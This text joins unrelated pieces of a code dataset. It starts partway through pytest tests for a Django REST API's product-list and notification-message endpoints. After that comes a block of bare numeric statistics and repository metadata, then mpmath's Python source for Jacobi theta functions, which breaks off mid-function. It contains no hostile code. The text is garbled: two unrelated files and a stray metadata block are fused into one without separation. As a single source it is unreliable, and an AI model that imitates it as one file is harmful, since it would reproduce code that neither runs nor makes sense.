u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="delete_productlist")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("productdb.delete_productlist")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_PRODUCTLIST_DETAIL % id)
assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED, "API endpoint is always read only"
assert response.json() == {'detail': 'Method "DELETE" not allowed.'}
assert ProductList.objects.count() == 1, "no product list was deleted"
def test_filter_fields(self):
pl_id = self.create_test_product_list()
mixer.blend("productdb.ProductList", name="Product List", string_product_list="Product A")
expected_result = {
"pagination": {
"page_records": 1,
"total_records": 1,
"url": {
"previous": None,
"next": None
},
"page": 1,
"last_page": 1
},
"data": [
{
"id": 0,
"name": self.TEST_PRODUCT_LIST_NAME,
"description": "<strong>Test Liste</strong>\nJust a test list",
"string_product_list": self.TEST_PRODUCTS,
"update_date": "",
"contact_email": "admin@localhost.localhost",
"url": "http://testserver/productdb/api/v1/productlists/%d/"
}
]
}
expected_result["data"][0]["id"] = pl_id
expected_result["data"][0]["update_date"] = date.today().strftime("%Y-%m-%d")
expected_result["data"][0]["url"] = expected_result["data"][0]["url"] % pl_id
client = APIClient()
client.login(**AUTH_USER)
# use ID field filter (exact match)
response = client.get(REST_PRODUCTLIST_LIST + "?id=%d" % pl_id)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# use name field (contains)
response = client.get(REST_PRODUCTLIST_LIST + "?name=" + quote(self.TEST_PRODUCT_LIST_NAME.lower()))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
# use description field (contains)
response = client.get(REST_PRODUCTLIST_LIST + "?description=" + quote("Just a test"))
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not provided"
assert jdata == expected_result, "unexpected result from API endpoint"
@pytest.mark.usefixtures("import_default_users")
@pytest.mark.usefixtures("import_default_vendors")
class TestNotificationMessageAPIEndpoint:
"""Django REST Framework API endpoint tests for the NotificationMessage model"""
today_string = DateFormat(datetime.now()).format(get_format(settings.SHORT_DATE_FORMAT))
def test_token_authentication(self, live_server):
token, _ = Token.objects.get_or_create(user=User.objects.get(username=AUTH_USER["username"]))
response = requests.get(live_server + REST_NOTIFICATIONMESSAGES_LIST, headers={
"Authorization": "Token %s" % token.key
})
assert response.status_code == status.HTTP_200_OK, response.text
response = requests.get(live_server + REST_NOTIFICATIONMESSAGES_LIST, headers={
"Authorization": "Token invalid_token"
})
assert response.status_code == status.HTTP_401_UNAUTHORIZED
def test_read_access_with_authenticated_user(self):
expected_result = {
"pagination": {
"page": 1,
"page_records": 1,
"url": {
"next": None,
"previous": None
},
"last_page": 1,
"total_records": 1
},
"data": [
{
"id": 1,
"title": "FooBar",
"type": "INFO",
"summary_message": "Test",
"detailed_message": "Test",
"created": ""
}
]
}
nm = mixer.blend("config.NotificationMessage")
expected_result["data"][0]["id"] = nm.id
expected_result["data"][0]["title"] = nm.title
expected_result["data"][0]["summary_message"] = nm.summary_message
expected_result["data"][0]["detailed_message"] = nm.detailed_message
expected_result["data"][0]["created"] = nm.created.isoformat().replace("+00:00", "Z")
client = APIClient()
client.login(**AUTH_USER)
response = client.get(REST_NOTIFICATIONMESSAGES_LIST)
assert response.status_code == status.HTTP_200_OK
jdata = response.json()
assert "pagination" in jdata, "pagination information not provided"
assert "data" in jdata, "data branch not found in result"
assert jdata["pagination"]["total_records"] == 1, "unexpected result from API endpoint"
print(jdata)
assert jdata == expected_result, "unexpected result from API endpoint"
def test_add_access_with_permission(self):
test_user = "user"
expected_result = {
"id": 1,
"title": "FooBar",
"type": "INFO",
"summary_message": "summary message",
"detailed_message": "detailed message",
"created": None
}
u = User.objects.create_user(test_user, "", test_user)
p = Permission.objects.get(codename="add_notificationmessage")
assert p is not None
u.user_permissions.add(p)
u.save()
assert u.has_perm("config.add_notificationmessage")
client = APIClient()
client.login(username=test_user, password=test_user)
# create with name
response = client.post(REST_NOTIFICATIONMESSAGES_LIST, data={
"title": expected_result["title"],
"summary_message": expected_result["summary_message"],
"detailed_message": expected_result["detailed_message"]
})
assert response.status_code == status.HTTP_201_CREATED, response.content.decode()
# adjust ID values from Database
nm_obj = NotificationMessage.objects.get(title=expected_result["title"])
expected_result["id"] = nm_obj.id
expected_result["created"] = nm_obj.created.isoformat().replace("+00:00", "Z")
assert response.json() == expected_result, "Should provide the new notification message"
def test_delete_access_with_permission(self):
nm = mixer.blend("config.NotificationMessage")
assert NotificationMessage.objects.count() == 1
test_user = "user"
u = User.objects.create_user(test_user, "", test_user)
perm = Permission.objects.get(codename="delete_notificationmessage")
assert perm is not None
u.user_permissions.add(perm)
u.save()
assert u.has_perm("config.delete_notificationmessage")
client = APIClient()
client.login(username=test_user, password=test_user)
response = client.delete(REST_NOTIFICATIONMESSAGES_DETAIL % nm.id)
assert response.status_code == status.HTTP_204_NO_CONTENT
assert NotificationMessage.objects.count() == 0
| 41.44815
| 137
| 0.575357
| 10,807
| 101,921
| 5.19913
| 0.035903
| 0.054319
| 0.038763
| 0.03887
| 0.887038
| 0.867585
| 0.847741
| 0.839162
| 0.823287
| 0.802054
| 0
| 0.012744
| 0.309426
| 101,921
| 2,458
| 138
| 41.465012
| 0.785548
| 0.031485
| 0
| 0.733887
| 0
| 0
| 0.254561
| 0.058031
| 0
| 0
| 0
| 0
| 0.157227
| 1
| 0.032227
| false
| 0.012207
| 0.015137
| 0
| 0.053711
| 0.000488
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b3d8323a163a43186b85417a1b40f3b656c30d0
| 37,320
|
py
|
Python
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 625
|
2015-01-07T04:56:25.000Z
|
2022-03-28T16:30:27.000Z
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 322
|
2015-01-01T15:19:37.000Z
|
2022-03-27T05:07:51.000Z
|
stats_scripts/mpmath/functions/theta.py
|
michalkouril/altanalyze
|
e721c79c56f7b0022516ff5456ebaa14104c933b
|
[
"Apache-2.0"
] | 160
|
2015-01-25T01:16:52.000Z
|
2022-03-21T14:44:20.000Z
|
from .functions import defun, defun_wrapped
@defun
def _jacobi_theta2(ctx, z, q):
extra1 = 10
extra2 = 20
# the loops below break when the fixed precision quantities
# a and b go to zero;
# right shifting small negative numbers by wp one obtains -1, not zero,
# so the condition a**2 + b**2 > MIN is used to break the loops.
MIN = 2
if z == ctx.zero:
if (not ctx._im(q)):
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
x2 = (x*x) >> wp
a = b = x2
s = x2
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
s += a
s = (1 << (wp+1)) + (s << 1)
s = ctx.ldexp(s, -wp)
else:
wp = ctx.prec + extra1
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp-1)
are = bre = x2re
aim = bim = x2im
sre = (1<<wp) + are
sim = aim
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
sre += are
sim += aim
sre = (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
else:
if (not ctx._im(q)) and (not ctx._im(z)):
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
x2 = (x*x) >> wp
a = b = x2
c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
cn = c1 = ctx.to_fixed(c1, wp)
sn = s1 = ctx.to_fixed(s1, wp)
c2 = (c1*c1 - s1*s1) >> wp
s2 = (c1 * s1) >> (wp - 1)
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
s = c1 + ((a * cn) >> wp)
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
s += (a * cn) >> wp
s = (s << 1)
s = ctx.ldexp(s, -wp)
s *= ctx.nthroot(q, 4)
return s
# case z real, q complex
elif not ctx._im(z):
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = x2re
aim = bim = x2im
c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
cn = c1 = ctx.to_fixed(c1, wp)
sn = s1 = ctx.to_fixed(s1, wp)
c2 = (c1*c1 - s1*s1) >> wp
s2 = (c1 * s1) >> (wp - 1)
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
sre = c1 + ((are * cn) >> wp)
sim = ((aim * cn) >> wp)
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
sre += ((are * cn) >> wp)
sim += ((aim * cn) >> wp)
sre = (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
#case z complex, q real
elif not ctx._im(q):
wp = ctx.prec + extra2
x = ctx.to_fixed(ctx._re(q), wp)
x2 = (x*x) >> wp
a = b = x2
prec0 = ctx.prec
ctx.prec = wp
c1, s1 = ctx.cos_sin(z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
#c2 = (c1*c1 - s1*s1) >> wp
c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
#s2 = (c1 * s1) >> (wp - 1)
s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
#cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
sre = c1re + ((a * cnre) >> wp)
sim = c1im + ((a * cnim) >> wp)
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
sre += ((a * cnre) >> wp)
sim += ((a * cnim) >> wp)
sre = (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
# case z and q complex
else:
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = x2re
aim = bim = x2im
prec0 = ctx.prec
ctx.prec = wp
# cos(z), sin(z) with z complex
c1, s1 = ctx.cos_sin(z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
n = 1
termre = c1re
termim = c1im
sre = c1re + ((are * cnre - aim * cnim) >> wp)
sim = c1im + ((are * cnim + aim * cnre) >> wp)
n = 3
termre = ((are * cnre - aim * cnim) >> wp)
termim = ((are * cnim + aim * cnre) >> wp)
sre = c1re + ((are * cnre - aim * cnim) >> wp)
sim = c1im + ((are * cnim + aim * cnre) >> wp)
n = 5
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
#cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
termre = ((are * cnre - aim * cnim) >> wp)
termim = ((aim * cnre + are * cnim) >> wp)
sre += ((are * cnre - aim * cnim) >> wp)
sim += ((aim * cnre + are * cnim) >> wp)
n += 2
sre = (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
s *= ctx.nthroot(q, 4)
return s
@defun
def _djacobi_theta2(ctx, z, q, nd):
MIN = 2
extra1 = 10
extra2 = 20
if (not ctx._im(q)) and (not ctx._im(z)):
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
x2 = (x*x) >> wp
a = b = x2
c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
cn = c1 = ctx.to_fixed(c1, wp)
sn = s1 = ctx.to_fixed(s1, wp)
c2 = (c1*c1 - s1*s1) >> wp
s2 = (c1 * s1) >> (wp - 1)
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
if (nd&1):
s = s1 + ((a * sn * 3**nd) >> wp)
else:
s = c1 + ((a * cn * 3**nd) >> wp)
n = 2
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
if nd&1:
s += (a * sn * (2*n+1)**nd) >> wp
else:
s += (a * cn * (2*n+1)**nd) >> wp
n += 1
s = -(s << 1)
s = ctx.ldexp(s, -wp)
# case z real, q complex
elif not ctx._im(z):
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = x2re
aim = bim = x2im
c1, s1 = ctx.cos_sin(ctx._re(z), prec=wp)
cn = c1 = ctx.to_fixed(c1, wp)
sn = s1 = ctx.to_fixed(s1, wp)
c2 = (c1*c1 - s1*s1) >> wp
s2 = (c1 * s1) >> (wp - 1)
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
if (nd&1):
sre = s1 + ((are * sn * 3**nd) >> wp)
sim = ((aim * sn * 3**nd) >> wp)
else:
sre = c1 + ((are * cn * 3**nd) >> wp)
sim = ((aim * cn * 3**nd) >> wp)
n = 5
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
if (nd&1):
sre += ((are * sn * n**nd) >> wp)
sim += ((aim * sn * n**nd) >> wp)
else:
sre += ((are * cn * n**nd) >> wp)
sim += ((aim * cn * n**nd) >> wp)
n += 2
sre = -(sre << 1)
sim = -(sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
#case z complex, q real
elif not ctx._im(q):
wp = ctx.prec + extra2
x = ctx.to_fixed(ctx._re(q), wp)
x2 = (x*x) >> wp
a = b = x2
prec0 = ctx.prec
ctx.prec = wp
c1, s1 = ctx.cos_sin(z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
#c2 = (c1*c1 - s1*s1) >> wp
c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
#s2 = (c1 * s1) >> (wp - 1)
s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
#cn, sn = (cn*c2 - sn*s2) >> wp, (sn*c2 + cn*s2) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if (nd&1):
sre = s1re + ((a * snre * 3**nd) >> wp)
sim = s1im + ((a * snim * 3**nd) >> wp)
else:
sre = c1re + ((a * cnre * 3**nd) >> wp)
sim = c1im + ((a * cnim * 3**nd) >> wp)
n = 5
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if (nd&1):
sre += ((a * snre * n**nd) >> wp)
sim += ((a * snim * n**nd) >> wp)
else:
sre += ((a * cnre * n**nd) >> wp)
sim += ((a * cnim * n**nd) >> wp)
n += 2
sre = -(sre << 1)
sim = -(sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
# case z and q complex
else:
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = x2re
aim = bim = x2im
prec0 = ctx.prec
ctx.prec = wp
# cos(2*z), sin(2*z) with z complex
c1, s1 = ctx.cos_sin(z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
c2re = (c1re*c1re - c1im*c1im - s1re*s1re + s1im*s1im) >> wp
c2im = (c1re*c1im - s1re*s1im) >> (wp - 1)
s2re = (c1re*s1re - c1im*s1im) >> (wp - 1)
s2im = (c1re*s1im + c1im*s1re) >> (wp - 1)
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if (nd&1):
sre = s1re + (((are * snre - aim * snim) * 3**nd) >> wp)
sim = s1im + (((are * snim + aim * snre)* 3**nd) >> wp)
else:
sre = c1re + (((are * cnre - aim * cnim) * 3**nd) >> wp)
sim = c1im + (((are * cnim + aim * cnre)* 3**nd) >> wp)
n = 5
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
#cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
t1 = (cnre*c2re - cnim*c2im - snre*s2re + snim*s2im) >> wp
t2 = (cnre*c2im + cnim*c2re - snre*s2im - snim*s2re) >> wp
t3 = (snre*c2re - snim*c2im + cnre*s2re - cnim*s2im) >> wp
t4 = (snre*c2im + snim*c2re + cnre*s2im + cnim*s2re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if (nd&1):
sre += (((are * snre - aim * snim) * n**nd) >> wp)
sim += (((aim * snre + are * snim) * n**nd) >> wp)
else:
sre += (((are * cnre - aim * cnim) * n**nd) >> wp)
sim += (((aim * cnre + are * cnim) * n**nd) >> wp)
n += 2
sre = -(sre << 1)
sim = -(sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
s *= ctx.nthroot(q, 4)
if (nd&1):
return (-1)**(nd//2) * s
else:
return (-1)**(1 + nd//2) * s
@defun
def _jacobi_theta3(ctx, z, q):
extra1 = 10
extra2 = 20
MIN = 2
if z == ctx.zero:
if not ctx._im(q):
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
s = x
a = b = x
x2 = (x*x) >> wp
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
s += a
s = (1 << wp) + (s << 1)
s = ctx.ldexp(s, -wp)
return s
else:
wp = ctx.prec + extra1
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
sre = are = bre = xre
sim = aim = bim = xim
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
sre += are
sim += aim
sre = (1 << wp) + (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
return s
else:
if (not ctx._im(q)) and (not ctx._im(z)):
s = 0
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
a = b = x
x2 = (x*x) >> wp
c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
c1 = ctx.to_fixed(c1, wp)
s1 = ctx.to_fixed(s1, wp)
cn = c1
sn = s1
s += (a * cn) >> wp
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
s += (a * cn) >> wp
s = (1 << wp) + (s << 1)
s = ctx.ldexp(s, -wp)
return s
# case z real, q complex
elif not ctx._im(z):
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = xre
aim = bim = xim
c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
c1 = ctx.to_fixed(c1, wp)
s1 = ctx.to_fixed(s1, wp)
cn = c1
sn = s1
sre = (are * cn) >> wp
sim = (aim * cn) >> wp
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
sre += (are * cn) >> wp
sim += (aim * cn) >> wp
sre = (1 << wp) + (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
return s
#case z complex, q real
elif not ctx._im(q):
wp = ctx.prec + extra2
x = ctx.to_fixed(ctx._re(q), wp)
a = b = x
x2 = (x*x) >> wp
prec0 = ctx.prec
ctx.prec = wp
c1, s1 = ctx.cos_sin(2*z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
sre = (a * cnre) >> wp
sim = (a * cnim) >> wp
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
sre += (a * cnre) >> wp
sim += (a * cnim) >> wp
sre = (1 << wp) + (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
return s
# case z and q complex
else:
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = xre
aim = bim = xim
prec0 = ctx.prec
ctx.prec = wp
# cos(2*z), sin(2*z) with z complex
c1, s1 = ctx.cos_sin(2*z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
sre = (are * cnre - aim * cnim) >> wp
sim = (aim * cnre + are * cnim) >> wp
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
sre += (are * cnre - aim * cnim) >> wp
sim += (aim * cnre + are * cnim) >> wp
sre = (1 << wp) + (sre << 1)
sim = (sim << 1)
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
return s
@defun
def _djacobi_theta3(ctx, z, q, nd):
"""nd=1,2,3 order of the derivative with respect to z"""
MIN = 2
extra1 = 10
extra2 = 20
if (not ctx._im(q)) and (not ctx._im(z)):
s = 0
wp = ctx.prec + extra1
x = ctx.to_fixed(ctx._re(q), wp)
a = b = x
x2 = (x*x) >> wp
c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
c1 = ctx.to_fixed(c1, wp)
s1 = ctx.to_fixed(s1, wp)
cn = c1
sn = s1
if (nd&1):
s += (a * sn) >> wp
else:
s += (a * cn) >> wp
n = 2
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
if nd&1:
s += (a * sn * n**nd) >> wp
else:
s += (a * cn * n**nd) >> wp
n += 1
s = -(s << (nd+1))
s = ctx.ldexp(s, -wp)
# case z real, q complex
elif not ctx._im(z):
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = xre
aim = bim = xim
c1, s1 = ctx.cos_sin(ctx._re(z)*2, prec=wp)
